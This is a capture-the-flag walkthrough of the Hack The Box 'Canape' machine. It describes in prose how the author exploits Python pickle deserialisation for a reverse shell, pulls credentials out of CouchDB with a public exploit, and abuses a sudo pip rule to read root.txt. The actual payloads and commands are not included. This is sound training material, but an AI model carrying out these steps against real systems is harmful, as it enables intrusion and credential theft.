Canape Box Writeup & Walkthrough – [HTB] – HackTheBox
This article shows how to hack Canape box and obtain both user.txt and root.txt.
The Canape is a machine on the HackTheBox platform.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
This article shows how to hack the Canape box and get user.txt and root.txt.
First, we scan the ports. (Same with other Boxes).
We find that only HTTP port open (80/TCP), so, the website must have security vulnerabilities.
Open the browser, and navigate to the website.
We then enumerate the website. After the enumeration, we identify a
.git folder. We now are able to gain the website source code by using
We also analyse the Git Log. And we found the “check” has security issue.
__init__.py file source code:
As you can see, there is cPickle. It is a built-in python module that allows you to serialise & de-serialise objects. In addition, inside the check function, there is a line:
item = cPickle.loads(data)
It means that this code has RCE security issue.
We are using the following payload.
Then, we use
nc to listen local port, and use the above payload to get a reverse shell.
Now, we check network connections by executing
There are 3 interesting open ports. Port 5984, 5986 and 65535.
After analysing, we identify that the port 65535 is running SSH service. The ports 5984 and 5986 are running CouchDB service.
First, we list all databases.
There are six databases. Then, we try to gain the data from password database.
Unfortunately, we are not able to access the database, but CouchDB has Remote Privilege Escalation issue. We can use this exploit. Due to that the database host locally, we have to run this exploit on the Canape server.
There are multiple ways to upload the exploit to the target server. I host a simpleHTTP server, then download the exploit to the target server.
Then, we execute our exploit and gain access to the password database.
We execute the above exploit and gain access to the password database.
We then list the tables.
Finally, we obtain the SSH password:
Next, we need to work on privilege escalation.
sudo and see what can we do.
Wow, we can run pip. There are two ways to obtain root.txt.
First, you can create a pip package, and using this package read root.txt. I used this way when I played this box. However, after I hacked another box, I learned another way.
As you may know,
pip can use
-r option means that “Install from the given requirements file.” It means that the
pip will read that file, if we provide
So, we create a soft link, the softlink links to root.txt.
Then, we run command, and use
-r option. Once we use
-r option, it reads the file, and we obtain the root.txt.
This box is a little complicated, if you have no idea how to design a web exploit. This box took me around 4 hours. I spent most of the time to create a pip package.